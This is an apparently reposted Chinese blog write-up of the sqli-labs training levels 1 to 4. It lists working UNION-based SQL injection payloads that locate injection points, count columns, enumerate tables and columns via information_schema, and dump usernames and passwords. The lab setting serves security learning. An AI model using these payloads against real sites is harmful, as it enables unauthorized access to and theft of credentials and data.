sql注入(3)sqli-labs1-4

目录

1.less-1 基于错误的GET单引号字符型注入

1.1判断注入点

1.2猜字段数

1.3判断显示位

1.4信息搜集

1.5数据收集

1.5.1爆破表名

 1.5.2爆破列名

1.5.3爆破users表

 2.less-2基于错误的GET整形注入

2.1注入点判断

3.less-3基于错误的GET单引号变形字符型注入

3.1注入点的判断

4.less-4基于错误的GET双引号字符型注入

4.1注入点判断


1.less-1 基于错误的GET单引号字符型注入

1.1判断注入点

/sqli-labs-master/Less-1/?id=1'

sql注入(3)sqli-labs1-4_第1张图片

1.2猜字段数

/sqli-labs-master/Less-1/?id=1' order by 1 --+

/sqli-labs-master/Less-1/?id=1' order by 2 --+

/sqli-labs-master/Less-1/?id=1' order by 3 --+

/sqli-labs-master/Less-1/?id=1' order by 4 --+

可以得到有3个字段。

-++是为了注释掉后面的内容,相当于#,?id=1'的作用是让这个字段错误,然后让系统执行union后面的字段。

1.3判断显示位

/sqli-labs-master/Less-1/?id=1'and 1=2 union select 1,2,3 --+

或者/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+

这里and 1=2或者负号的作用是让union前面的字段错误,然后执行union后面的字段。

sql注入(3)sqli-labs1-4_第2张图片

1.4信息搜集

database:security

version:5.5.53

user:root@lacalhost

version_compile_os:win32

/sqli-labs-master/Less-1/?id=1'and 1=2 union select 1,database(),version() --+ 

/sqli-labs-master/Less-1/?id=-1' union select 1,user(),@@version_compile_os --+

sql注入(3)sqli-labs1-4_第3张图片

sql注入(3)sqli-labs1-4_第4张图片

1.5数据收集

版本为5.5.53,存在information_schema数据库。

1.5.1爆破表名

/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

sql注入(3)sqli-labs1-4_第5张图片

 1.5.2爆破列名

/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' --+

(数据库security包含的全部列名)

sql注入(3)sqli-labs1-4_第6张图片

/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

(user表包含的列名)

sql注入(3)sqli-labs1-4_第7张图片

1.5.3爆破users表

爆破users表中的用户名username和密码password

/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

sql注入(3)sqli-labs1-4_第8张图片

 2.less-2基于错误的GET整形注入

2.1注入点判断

sql注入(3)sqli-labs1-4_第9张图片

所以不加单引号即为整形。

/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3 --+

//注意:所有符号必须在英文状态下输入,因为MySQL只支持英文符号。

sql注入(3)sqli-labs1-4_第10张图片

其余注入内容和第一题类似。

3.less-3基于错误的GET单引号变形字符型注入

3.1注入点的判断

sql注入(3)sqli-labs1-4_第11张图片

/sqli-labs-master/Less-3/?id=1')

/sqli-labs-master/Less-3/?id=1')%20 and 1=2 union select 1,2,3 --+ 

sql注入(3)sqli-labs1-4_第12张图片

其余注入步骤如less-1

4.less-4基于错误的GET双引号字符型注入

4.1注入点判断

sql注入(3)sqli-labs1-4_第13张图片

/sqli-labs-master/Less-4/?id=1")and 1=2 union select 1,2,3 --+

sql注入(3)sqli-labs1-4_第14张图片

 其余步骤和less-1一样,结果也一样。

sql注入(3)sqli-labs1-4_第15张图片

你可能感兴趣的:(web安全杂记,网络安全)